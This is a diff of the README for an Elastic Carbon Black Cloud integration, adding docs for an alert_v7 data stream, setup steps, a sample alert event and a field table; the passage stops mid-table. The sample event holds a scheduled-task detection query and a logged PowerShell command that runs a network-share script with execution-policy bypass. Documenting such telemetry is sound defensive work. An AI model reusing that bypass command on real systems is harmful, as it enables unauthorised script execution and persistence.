The HTTPJSON input method will not receive enhancement changes and will not support the new `alert_v7` data stream. + +## Note (Important) +1. Do not enable both the HTTPJSON and CEL input methods within a single data stream; having both enabled simultaneously can cause unexpected/duplicated results, as they operate on the same data streams. + +2. When using the AWS-S3 input, use either the old alert data stream or the new [Beta] alert_v7 data stream that supports the Data Forwarder 2.0 schema. + +3. The `alert_v7` data stream is supported by our new `Alert V7` dashboards. The old `Alert` dashboards will not reflect the new changes. -This module has been tested against `Alerts API (v6)`, `Audit Log Events (v3)` and `Vulnerability Assessment (v1)`. + +## Compatibility +This module has been tested against `Alerts API (v7) [Beta]`, `Alerts API (v6)`, `Audit Log Events (v3)` and `Vulnerability Assessment (v1)`. ## Requirements 
@@ -15,27 +35,30 @@ This module has been tested against `Alerts API (v6)`, `Audit Log Events (v3)` a | Data Stream Name | Bucket List Prefix | | ----------------- | ---------------------- | + | Alert_v7 | alert_logs_v7 | | Alert | alert_logs | | Endpoint Event | endpoint_event_logs | | Watchlist Hit | watchlist_hit_logs | ### To collect data from AWS SQS, follow the below steps: 1. If data forwarding to an AWS S3 Bucket hasn't been configured, then first setup an AWS S3 Bucket as mentioned in the above documentation. -2. To setup an SQS queue, follow "Step 1: Create an Amazon SQS queue" mentioned in the [Documentation](https://docs.aws.amazon.com/AmazonS3/latest/userguide/ways-to-add-notification-config-to-bucket.html). +2. To set up an SQS queue, follow "Step 1: Create an Amazon SQS queue" mentioned in the [Documentation](https://docs.aws.amazon.com/AmazonS3/latest/userguide/ways-to-add-notification-config-to-bucket.html). - While creating an SQS Queue, please provide the same bucket ARN that has been generated after creating an AWS S3 Bucket. -3. Setup event notification for an S3 bucket. Follow this [Link](https://docs.aws.amazon.com/AmazonS3/latest/userguide/enable-event-notifications.html). - - The user has to perform Step 3 for all the data-streams individually, and each time prefix parameter should be set the same as the S3 Bucket List Prefix as created earlier. (for example, `alert_logs/` for alert data stream.) +3. Set up event notification for an S3 bucket. Follow this [Link](https://docs.aws.amazon.com/AmazonS3/latest/userguide/enable-event-notifications.html). + - The user has to perform Step 3 for all the data streams individually, and each time prefix parameter should be set the same as the S3 Bucket List Prefix as created earlier. (for example, `alert_logs/` for the alert data stream.) 
- For all the event notifications that have been created, select the event type as s3:ObjectCreated:*, select the destination type SQS Queue, and select the queue that has been created in Step 2. **Note**: - Credentials for the above AWS S3 and SQS input types should be configured using the [link](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-aws-s3.html#aws-credentials-config). - Data collection via AWS S3 Bucket and AWS SQS are mutually exclusive in this case. + - When configuring SQS queues, separate queues should be used for each data stream instead of the global SQS queue from version 1.21 onwards to avoid data + loss. File selectors should not be used to filter out data stream logs using the global queue as it was in versions prior. ### In order to ingest data from the APIs you must generate API keys and API Secret Keys: 1. In Carbon Black Cloud, On the left navigation pane, click **Settings > API Access**. 2. Click Add API Key. 3. Give the API key a unique name and description. - - Select the appropriate access level type. Please check required Access Levels & Permissions for integration in below table. + - Select the appropriate access level type. Please check the required Access Levels & Permissions for integration in the table below. **Note:** To use a custom access level, select Custom from the Access Level type drop-down menu and specify the Custom Access Level. - Optional: Add authorized IP addresses. - You can restrict the use of an API key to a specific set of IP addresses for security reasons. @@ -127,7 +150,6 @@ An example event for `audit` looks as following: "carbon_black_cloud-audit" ] } - ``` **Exported fields** @@ -294,7 +316,6 @@ An example event for `alert` looks as following: "name": "test34@demo.com" } } - ``` **Exported fields** 
@@ -414,6 +435,424 @@ An example event for `alert` looks as following: | user.name.text | Multi-field of `user.name`. | match_only_text | +### Alert + +This is the `alert_v7` dataset. + +An example event for `alert_v7` looks as following: + +```json +{ + "@timestamp": "2024-03-13T08:02:36.578Z", + "agent": { + "ephemeral_id": "9c46ff77-c269-4593-a3d8-efd89fbdca66", + "id": "db2930ff-774e-4541-bcd4-1a6a1d656167", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "carbon_black_cloud": { + "alert": { + "alert_notes_present": false, + "backend_timestamp": "2024-03-13T08:03:29.540Z", + "backend_update_timestamp": "2024-03-13T08:03:29.540Z", + "category": "THREAT", + "determination": { + "change_timestamp": "2024-03-13T08:03:29.540Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "value": "NONE" + }, + "device": { + "external_ip": "75.98.230.194", + "internal_ip": "172.16.100.140", + "location": "UNKNOWN", + "os": "WINDOWS", + "policy": "default", + "policy_id": 6525, + "target_value": "MEDIUM" + }, + "ioc": { + "hit": "(fileless_scriptload_cmdline:Register-ScheduledTask OR fileless_scriptload_cmdline:New-ScheduledTask OR scriptload_content:Register-ScheduledTask OR scriptload_content:New-ScheduledTask) AND NOT (process_cmdline:windows\\\\ccm\\\\systemtemp OR crossproc_name:windows\\\\ccm\\\\ccmexec.exe OR (process_publisher:\"VMware, Inc.\" AND process_publisher_state:FILE_SIGNATURE_STATE_TRUSTED))", + "id": "d1080521-e617-4e45-94e0-7a145c62c90a" + }, + "is_updated": false, + "mdr": { + "alert": false, + "alert_notes_present": false, + "threat_notes_present": false + }, + "ml_classification_final_verdict": "NOT_ANOMALOUS", + "ml_classification_global_prevalence": "LOW", + "ml_classification_org_prevalence": "LOW", + "organization_key": "7DESJ9GN", + "parent": { + "cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": 
"7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275", + "hash": { + "md5": "145dcf6706eeea5b066885ee17964c09", + "sha256": "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3" + }, + "name": "c:\\windows\\system32\\svchost.exe", + "pid": 1916, + "reputation": "TRUSTED_WHITE_LIST", + "username": "NT AUTHORITY\\SYSTEM" + }, + "policy_applied": "NOT_APPLIED", + "primary_event_id": "re9M9hp8TbGLqyk6QXqQqA-0", + "process": { + "cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -EP Bypass \\\\eip.demo\\sysvol\\EIP.DEMO\\scripts\\Luminol.ps1", + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe", + "hash": { + "md5": "2e5a8590cf6848968fc23de3fa1e25f1", + "sha256": "9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3" + }, + "issuer": [ + "Microsoft Windows Production PCA 2011" + ], + "name": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "pid": 5172, + "publisher": [ + "Microsoft Windows" + ], + "reputation": "TRUSTED_WHITE_LIST", + "username": "NT AUTHORITY\\SYSTEM" + }, + "reason_code": "c21ca826-573a-3d97-8c1e-93c8471aab7f:8033b29d-81d2-3c47-82d2-f4a7f398b85d", + "report": { + "description": "Newer Powershell versions introduced built-in cmdlets to manage scheduled tasks natively without calling out to typical scheduled task processes like at.exe or schtasks.exe. This detection looks for behaviors related to the fileless execution of scheduled tasks. 
If you are responding to this alert, be sure to correlate the fileless scriptload events with events typically found in your environment Generally, attackers will create scheduled tasks with binaries that are located in user writable directories like AppData, Temp, or public folders.", + "id": "LrKOC7DtQbm4g8w0UFruQg-d1080521-e617-4e45-94e0-7a145c62c90a", + "link": "https://attack.mitre.org/techniques/T1053/", + "name": "Execution - AMSI - New Fileless Scheduled Task Behavior Detected", + "tags": [ + "execution", + "privesc", + "persistence", + "t1053", + "windows", + "amsi", + "attack", + "attackframework" + ] + }, + "run_state": "RAN", + "sensor_action": "ALLOW", + "threat_id": "C21CA826573A8D974C1E93C8471AAB7F", + "threat_notes_present": false, + "type": "WATCHLIST", + "url": "defense.conferdeploy.net/alerts?s[c][query_string]=id:1c6aba68-24cc-41e3-ad8e-4b545a587b55&orgKey=7DESJ9GN", + "watchlists": [ + { + "id": "Ci7w5B4URg6HN60hatQMQ", + "name": "AMSI Threat Intelligence" + } + ], + "workflow": { + "change_timestamp": "2024-03-13T08:03:29.540Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "closure_reason": "NO_REASON", + "status": "OPEN" + } + } + }, + "data_stream": { + "dataset": "carbon_black_cloud.alert_v7", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "db2930ff-774e-4541-bcd4-1a6a1d656167", + "snapshot": false, + "version": "8.12.1" + }, + "event": { + "agent_id_status": "verified", + "dataset": "carbon_black_cloud.alert_v7", + "end": "2024-03-13T08:00:09.894Z", + "id": "1c6aba68-24cc-41e3-ad8e-4b545a587b55", + "ingested": "2024-04-10T09:06:02Z", + "kind": "alert", + "original": 
"{\"alert_notes_present\":false,\"alert_url\":\"defense.conferdeploy.net/alerts?s[c][query_string]=id:1c6aba68-24cc-41e3-ad8e-4b545a587b55\\u0026orgKey=7DESJ9GN\",\"asset_group\":[],\"backend_timestamp\":\"2024-03-13T08:03:29.540Z\",\"backend_update_timestamp\":\"2024-03-13T08:03:29.540Z\",\"childproc_cmdline\":\"\",\"childproc_guid\":\"\",\"childproc_username\":\"\",\"detection_timestamp\":\"2024-03-13T08:02:36.578Z\",\"determination\":{\"change_timestamp\":\"2024-03-13T08:03:29.540Z\",\"changed_by\":\"ALERT_CREATION\",\"changed_by_type\":\"SYSTEM\",\"value\":\"NONE\"},\"device_external_ip\":\"75.98.230.194\",\"device_id\":6612391,\"device_internal_ip\":\"172.16.100.140\",\"device_location\":\"UNKNOWN\",\"device_name\":\"EIP\\\\WW-20002\",\"device_os\":\"WINDOWS\",\"device_os_version\":\"Windows 10 x64\",\"device_policy\":\"default\",\"device_policy_id\":6525,\"device_target_value\":\"MEDIUM\",\"device_uem_id\":\"\",\"device_username\":\"EIP\\\\Administrator\",\"first_event_timestamp\":\"2024-03-13T08:00:09.894Z\",\"id\":\"1c6aba68-24cc-41e3-ad8e-4b545a587b55\",\"ioc_hit\":\"(fileless_scriptload_cmdline:Register-ScheduledTask OR fileless_scriptload_cmdline:New-ScheduledTask OR scriptload_content:Register-ScheduledTask OR scriptload_content:New-ScheduledTask) AND NOT (process_cmdline:windows\\\\\\\\ccm\\\\\\\\systemtemp OR crossproc_name:windows\\\\\\\\ccm\\\\\\\\ccmexec.exe OR (process_publisher:\\\"VMware, Inc.\\\" AND process_publisher_state:FILE_SIGNATURE_STATE_TRUSTED))\",\"ioc_id\":\"d1080521-e617-4e45-94e0-7a145c62c90a\",\"is_updated\":false,\"last_event_timestamp\":\"2024-03-13T08:00:09.894Z\",\"mdr_alert\":false,\"mdr_alert_notes_present\":false,\"mdr_threat_notes_present\":false,\"ml_classification_anomalies\":[],\"ml_classification_final_verdict\":\"NOT_ANOMALOUS\",\"ml_classification_global_prevalence\":\"LOW\",\"ml_classification_org_prevalence\":\"LOW\",\"org_key\":\"7DESJ9GN\",\"parent_cmdline\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs 
-p -s Schedule\",\"parent_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_guid\":\"7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275\",\"parent_md5\":\"145dcf6706eeea5b066885ee17964c09\",\"parent_name\":\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"parent_pid\":1916,\"parent_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_sha256\":\"f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3\",\"parent_username\":\"NT AUTHORITY\\\\SYSTEM\",\"policy_applied\":\"NOT_APPLIED\",\"primary_event_id\":\"re9M9hp8TbGLqyk6QXqQqA-0\",\"process_cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -EP Bypass \\\\\\\\eip.demo\\\\sysvol\\\\EIP.DEMO\\\\scripts\\\\Luminol.ps1\",\"process_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"process_guid\":\"7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe\",\"process_issuer\":[\"Microsoft Windows Production PCA 2011\"],\"process_md5\":\"2e5a8590cf6848968fc23de3fa1e25f1\",\"process_name\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"process_pid\":5172,\"process_publisher\":[\"Microsoft Windows\"],\"process_reputation\":\"TRUSTED_WHITE_LIST\",\"process_sha256\":\"9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"reason\":\"Process powershell.exe was detected by the report \\\"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\\\" in watchlist \\\"AMSI Threat Intelligence\\\"\",\"reason_code\":\"c21ca826-573a-3d97-8c1e-93c8471aab7f:8033b29d-81d2-3c47-82d2-f4a7f398b85d\",\"report_description\":\"Newer Powershell versions introduced built-in cmdlets to manage scheduled tasks natively without calling out to typical scheduled task processes like at.exe or schtasks.exe. This detection looks for behaviors related to the fileless execution of scheduled tasks. 
If you are responding to this alert, be sure to correlate the fileless scriptload events with events typically found in your environment Generally, attackers will create scheduled tasks with binaries that are located in user writable directories like AppData, Temp, or public folders.\",\"report_id\":\"LrKOC7DtQbm4g8w0UFruQg-d1080521-e617-4e45-94e0-7a145c62c90a\",\"report_link\":\"https://attack.mitre.org/techniques/T1053/\",\"report_name\":\"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\",\"report_tags\":[\"execution\",\"privesc\",\"persistence\",\"t1053\",\"windows\",\"amsi\",\"attack\",\"attackframework\"],\"run_state\":\"RAN\",\"sensor_action\":\"ALLOW\",\"severity\":5,\"tags\":null,\"threat_id\":\"C21CA826573A8D974C1E93C8471AAB7F\",\"threat_notes_present\":false,\"type\":\"WATCHLIST\",\"user_update_timestamp\":null,\"watchlists\":[{\"id\":\"Ci7w5B4URg6HN60hatQMQ\",\"name\":\"AMSI Threat Intelligence\"}],\"workflow\":{\"change_timestamp\":\"2024-03-13T08:03:29.540Z\",\"changed_by\":\"ALERT_CREATION\",\"changed_by_type\":\"SYSTEM\",\"closure_reason\":\"NO_REASON\",\"status\":\"OPEN\"}}", + "reason": "Process powershell.exe was detected by the report \"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\" in watchlist \"AMSI Threat Intelligence\"", + "severity": 5, + "start": "2024-03-13T08:00:09.894Z" + }, + "host": { + "hostname": "WW-20002", + "id": "6612391", + "name": "WW-20002", + "os": { + "type": "windows", + "version": "Windows 10 x64" + } + }, + "input": { + "type": "cel" + }, + "process": { + "command_line": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -EP Bypass \\\\eip.demo\\sysvol\\EIP.DEMO\\scripts\\Luminol.ps1", + "entity_id": "7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "2e5a8590cf6848968fc23de3fa1e25f1", + "sha256": "9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3" 
+ }, + "name": "powershell.exe", + "parent": { + "command_line": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", + "entity_id": "7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275", + "executable": "c:\\windows\\system32\\svchost.exe", + "hash": { + "md5": "145dcf6706eeea5b066885ee17964c09", + "sha256": "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3" + }, + "name": "svchost.exe", + "pid": 1916 + }, + "pid": 5172 + }, + "related": { + "hash": [ + "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3", + "145dcf6706eeea5b066885ee17964c09", + "9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3", + "2e5a8590cf6848968fc23de3fa1e25f1" + ], + "hosts": [ + "WW-20002", + "EIP" + ], + "user": [ + "Administrator" + ] + }, + "tags": [ + "preserve_original_event", + "forwarded", + "carbon_black_cloud-alert" + ], + "user": { + "domain": "EIP", + "name": "Administrator" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| carbon_black_cloud.alert.additional_events_present | Indicator to let API and forwarder users know that they should look up other associated events related to this alert. | boolean | +| carbon_black_cloud.alert.alert_notes_present | Indicates if notes are associated with the alert. | boolean | +| carbon_black_cloud.alert.attack_tactic | S tactic from the MITRE ATT&CK framework. | keyword | +| carbon_black_cloud.alert.attack_technique | Technique from the MITRE ATT&CK framework. | keyword | +| carbon_black_cloud.alert.backend_timestamp | Timestamp when the alert was first detected by the Carbon Black Cloud backend, it is a ISO 8601 UTC timestamp. | date | +| carbon_black_cloud.alert.backend_update_timestamp | The last time the alert was updated in Carbon Black Cloud, it is a ISO 8601 UTC timestamp. 
| date | +| carbon_black_cloud.alert.blocked_process.effective_reputation | Effective reputation of the blocked file or process; applied by the sensor at the time the block occurred. | keyword | +| carbon_black_cloud.alert.blocked_process.hash.md5 | MD5 hash of the child process binary; for any process terminated by the sensor. | keyword | +| carbon_black_cloud.alert.blocked_process.hash.sha256 | SHA-256 hash of the child process binary; for any process terminated by the sensor. | keyword | +| carbon_black_cloud.alert.blocked_process.name | Tokenized file path of the files blocked by sensor action. | keyword | +| carbon_black_cloud.alert.category | The category of the alert. | keyword | +| carbon_black_cloud.alert.childproc.cmdline | Command line executed by the child process. | keyword | +| carbon_black_cloud.alert.childproc.effective_reputation | Effective reputation of the child process hash. | keyword | +| carbon_black_cloud.alert.childproc.guid | Guid of the child process that has fired the alert. | keyword | +| carbon_black_cloud.alert.childproc.hash.md5 | MD5 hash of the child process. | keyword | +| carbon_black_cloud.alert.childproc.hash.sha256 | SHA-256 hash of the child process. | keyword | +| carbon_black_cloud.alert.childproc.name | Filesystem path of the child process binary. | keyword | +| carbon_black_cloud.alert.childproc.username | User context in which the child process was executed. | keyword | +| carbon_black_cloud.alert.connection_type | The type of network connection (e.g., EGRESS, INGRESS). 
| keyword | +| carbon_black_cloud.alert.determination.change_timestamp | Timestamp of the determination change | date | +| carbon_black_cloud.alert.determination.changed_by | Entity that changed the determination | keyword | +| carbon_black_cloud.alert.determination.changed_by_type | Type of entity that changed the determination | keyword | +| carbon_black_cloud.alert.determination.value | Value of the determination | keyword | +| carbon_black_cloud.alert.device.external_ip | IP address of the endpoint according to the Carbon Black Cloud; can differ from device_internal_ip due to network proxy or NAT. | keyword | +| carbon_black_cloud.alert.device.internal_ip | IP address of the endpoint reported by the sensor. | keyword | +| carbon_black_cloud.alert.device.location | Whether the device was on or off premises when the alert started, based on the current IP address and the device’s registered DNS domain suffix. | keyword | +| carbon_black_cloud.alert.device.os | OS of the device. | keyword | +| carbon_black_cloud.alert.device.policy | The name of the device policy associated with the device at the time of the alert. | keyword | +| carbon_black_cloud.alert.device.policy_id | The identifier for the device policy associated with the device at the time of the alert. | integer | +| carbon_black_cloud.alert.device.target_value | Target value assigned to the device, set from the policy. | keyword | +| carbon_black_cloud.alert.device.uem_id | Device correlation with WS1/EUC, required for our Workspace ONE Intelligence integration to function. | keyword | +| carbon_black_cloud.alert.egress_group_id | The unique identifier of the egress group associated with the event. | keyword | +| carbon_black_cloud.alert.egress_group_name | The name of the egress group associated with the event. | keyword | +| carbon_black_cloud.alert.ioc.field | The field the indicator of comprise (IOC) hit contains. 
| keyword | +| carbon_black_cloud.alert.ioc.hit | IOC field value or IOC query that matches. | keyword | +| carbon_black_cloud.alert.ioc.id | The identifier of the IOC that cause the hit. | keyword | +| carbon_black_cloud.alert.ip_reputation | The reputation score of the IP address associated with the event. | integer | +| carbon_black_cloud.alert.is_updated | Set to true if this is an updated copy of the alert initiated by the Carbon Black Cloud backend. | boolean | +| carbon_black_cloud.alert.k8s_cluster | The Kubernetes cluster associated with the event. | keyword | +| carbon_black_cloud.alert.k8s_kind | The type of Kubernetes resource associated with the event (e.g., Pod, DaemonSet). | keyword | +| carbon_black_cloud.alert.k8s_namespace | The Kubernetes namespace associated with the event. | keyword | +| carbon_black_cloud.alert.k8s_pod_name | The name of the Kubernetes pod associated with the event. | keyword | +| carbon_black_cloud.alert.k8s_policy | The name of the Kubernetes policy associated with the event. | keyword | +| carbon_black_cloud.alert.k8s_policy_id | The unique identifier of the Kubernetes policy associated with the event. | keyword | +| carbon_black_cloud.alert.k8s_rule | The name of the Kubernetes rule associated with the event. | keyword | +| carbon_black_cloud.alert.k8s_rule_id | The unique identifier of the Kubernetes rule associated with the event. | keyword | +| carbon_black_cloud.alert.k8s_workload_name | The name of the Kubernetes workload associated with the event. | keyword | +| carbon_black_cloud.alert.mdr.alert | Is the alert eligible for review by Carbon Black MDR Analysts. | boolean | +| carbon_black_cloud.alert.mdr.alert_notes_present | Customer visible notes at the alert level that were added by a MDR analyst. | boolean | +| carbon_black_cloud.alert.mdr.classification.change_timestamp | WWhen the last MDR classification change occurred, it is a ISO 8601 UTC timestamp. 
| date | +| carbon_black_cloud.alert.mdr.determination.change_timestamp | When the last MDR classification change occurred, it is a ISO 8601 UTC timestamp. | date | +| carbon_black_cloud.alert.mdr.determination.value | A record that identifies the whether the alert was determined to represent a likely or unlikely threat. | keyword | +| carbon_black_cloud.alert.mdr.threat_notes_present | Customer visible notes at the threat level that were added by a MDR analyst. | boolean | +| carbon_black_cloud.alert.mdr.workflow.change_timestamp | WWhen the last MDR status change occurred, it is a ISO 8601 UTC timestamp. | date | +| carbon_black_cloud.alert.mdr.workflow.is_assigned | If the workflow is assigned or not. | boolean | +| carbon_black_cloud.alert.mdr.workflow.status | Primary value used to capture status change during MD Analyst's alert triage. | boolean | +| carbon_black_cloud.alert.ml_classification_anomalies | An list of anomalies detected by the machine learning classification. | keyword | +| carbon_black_cloud.alert.ml_classification_final_verdict | Final verdict of the alert, based on the ML models that were used to make the prediction. | keyword | +| carbon_black_cloud.alert.ml_classification_global_prevalence | Categories (low/medium/high) used to describe the prevalence of alerts across all regional organizations. | keyword | +| carbon_black_cloud.alert.ml_classification_org_prevalence | TCategories (low/medium/high) used to describe the prevalence of alerts within an organization. | keyword | +| carbon_black_cloud.alert.netconn.local_ip | IP address of the local side of the network connection. | ip | +| carbon_black_cloud.alert.netconn.local_ipv4 | IPv4 address of the local side of the network connection. | ip | +| carbon_black_cloud.alert.netconn.local_ipv6 | IPv6 address of the local side of the network connection. | ip | +| carbon_black_cloud.alert.netconn.local_port | TCP or UDP port used by the local side of the network connection. 
| integer | +| carbon_black_cloud.alert.netconn.protocol | Network protocol of the network connection. | keyword | +| carbon_black_cloud.alert.netconn.remote_domain | Domain name (FQDN) associated with the remote end of the network connection. | keyword | +| carbon_black_cloud.alert.netconn.remote_ip | IP address of the remote side of the network connection. | ip | +| carbon_black_cloud.alert.netconn.remote_ipv4 | IPv4 address of the remote side of the network connection. | ip | +| carbon_black_cloud.alert.netconn.remote_ipv6 | IPv6 address of the remote side of the network connection. | ip | +| carbon_black_cloud.alert.netconn.remote_port | TCP or UDP port used by the remote side of the network connection; same as netconn_port and event_network_remote_port. | integer | +| carbon_black_cloud.alert.org_feature_entitlement | The feature entitlement of the organization. | keyword | +| carbon_black_cloud.alert.organization_key | The unique identifier for the organization associated with the alert. | keyword | +| carbon_black_cloud.alert.parent.cmdline | Command line executed by the parent process. | keyword | +| carbon_black_cloud.alert.parent.effective_reputation | Effective reputation of the parent hash. | keyword | +| carbon_black_cloud.alert.parent.guid | Guid of the parent process that has fired the alert. | keyword | +| carbon_black_cloud.alert.parent.hash.md5 | MD5 hash of the parent process. | keyword | +| carbon_black_cloud.alert.parent.hash.sha256 | SHA-256 hash of the parent process. | keyword | +| carbon_black_cloud.alert.parent.name | Filesystem path of the parent process binary. | keyword | +| carbon_black_cloud.alert.parent.pid | PID of the parent process that has fired the alert. | long | +| carbon_black_cloud.alert.parent.reputation | Reputation of the parent process; applied when event is processed by the Carbon Black Cloud. | keyword | +| carbon_black_cloud.alert.parent.username | User context in which the parent process was executed. 
| keyword | +| carbon_black_cloud.alert.policy_applied | Whether a policy was applied. | keyword | +| carbon_black_cloud.alert.primary_event_id | ID of the primary event in the alert. | keyword | +| carbon_black_cloud.alert.process.cmdline | Command line executed by the actor process. | keyword | +| carbon_black_cloud.alert.process.effective_reputation | Effective reputation of the actor hash. | keyword | +| carbon_black_cloud.alert.process.guid | Guid of the process that has fired the alert. | keyword | +| carbon_black_cloud.alert.process.hash.md5 | MD5 hash of the process. | keyword | +| carbon_black_cloud.alert.process.hash.sha256 | SHA-256 hash of the process. | keyword | +| carbon_black_cloud.alert.process.issuer | The certificate authority associated with the process's certificate. | keyword | +| carbon_black_cloud.alert.process.name | Filesystem path of the actor process binary. | keyword | +| carbon_black_cloud.alert.process.pid | PID of the process that has fired the alert. | long | +| carbon_black_cloud.alert.process.publisher | Publisher name on the certificate used to sign the Windows or macOS process binary. | keyword | +| carbon_black_cloud.alert.process.reputation | Reputation of the actor process; applied when event is processed by the Carbon Black Cloud. | keyword | +| carbon_black_cloud.alert.process.username | User context in which the actor process was executed. | keyword | +| carbon_black_cloud.alert.product_id | The hexadecimal id of the USB device's product. | keyword | +| carbon_black_cloud.alert.product_name | The name of the USB device's vendor. | keyword | +| carbon_black_cloud.alert.reason | A spoken language written explanation of the what and why the alert occurred and any action taken. | keyword | +| carbon_black_cloud.alert.reason_code | Shorthand enum for the full-text reason. | keyword | +| carbon_black_cloud.alert.remote_is_private | Indicates whether the remote IP address is private or not. 
| boolean | +| carbon_black_cloud.alert.report.description | Description of the IOC report associated with the alert. | keyword | +| carbon_black_cloud.alert.report.id | The identifier of the report that contains the IOC. | keyword | +| carbon_black_cloud.alert.report.link | Link of reports that contained the IOC that caused a hit. | keyword | +| carbon_black_cloud.alert.report.name | The name of the report that contains the IOC. | keyword | +| carbon_black_cloud.alert.report.tags | Tags associated with the IOC report. | keyword | +| carbon_black_cloud.alert.rule_category_id | ID representing the category of the rule_id for certain alert types. | keyword | +| carbon_black_cloud.alert.rule_config_id | ID of the rule configuration that triggered an alert. | keyword | +| carbon_black_cloud.alert.rule_config_name | Name of the rule configuration that triggered an alert. | keyword | +| carbon_black_cloud.alert.rule_config_type | Type of the rule configuration that triggered an alert. | keyword | +| carbon_black_cloud.alert.rule_id | ID of the rule that triggered an alert. | keyword | +| carbon_black_cloud.alert.run_state | Whether the threat in the alert ran. | keyword | +| carbon_black_cloud.alert.sensor_action | The action taken by the sensor, according to the rule of the policy. | keyword | +| carbon_black_cloud.alert.serial_number | The serial number of the USB device. | keyword | +| carbon_black_cloud.alert.status | status of alert. | keyword | +| carbon_black_cloud.alert.tags | Tags associated with the alert. | keyword | +| carbon_black_cloud.alert.threat_category | Categories of threats which we were able to take action on. | keyword | +| carbon_black_cloud.alert.threat_id | The identifier of a threat which this alert belongs. Threats are comprised of a combination of factors that can be repeated across devices. | keyword | +| carbon_black_cloud.alert.threat_name | Name of the threat. 
| keyword | +| carbon_black_cloud.alert.threat_notes_present | Indicates if notes are associated with the threat_id. | boolean | +| carbon_black_cloud.alert.tms_rule_id | Threat intrusion detection id. | keyword | +| carbon_black_cloud.alert.ttps | Other potential malicious activities involved in a threat. | keyword | +| carbon_black_cloud.alert.type | Type of alert. | keyword | +| carbon_black_cloud.alert.url | Link to the alerts page for this alert. Does not vary by alert type. | keyword | +| carbon_black_cloud.alert.user_update_timestamp | Timestamp of the last property of an alert changed by a user, such as the alert workflow or determination, it is a ISO 8601 UTC timestamp. | date | +| carbon_black_cloud.alert.vendor_id | The hexadecimal id of the USB device's vendor. | keyword | +| carbon_black_cloud.alert.vendor_name | The name of the USB device's vendor. | keyword | +| carbon_black_cloud.alert.version | The version of the schema being emitted. | keyword | +| carbon_black_cloud.alert.watchlists.id | Identifier of the watchlist. | keyword | +| carbon_black_cloud.alert.watchlists.name | Name of the watchlist. | keyword | +| carbon_black_cloud.alert.workflow.change_timestamp | The last change/update time of workflow. | date | +| carbon_black_cloud.alert.workflow.changed_by | The name of process which changed the workflow. | keyword | +| carbon_black_cloud.alert.workflow.changed_by_autoclose_rule_id | The rule id that auto closed the workflow. | keyword | +| carbon_black_cloud.alert.workflow.changed_by_type | The type of user who changed the workflow. | keyword | +| carbon_black_cloud.alert.workflow.closure_reason | Reason for which the workflow was closed. | keyword | +| carbon_black_cloud.alert.workflow.status | The status of the workflow. | keyword | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. 
| keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the 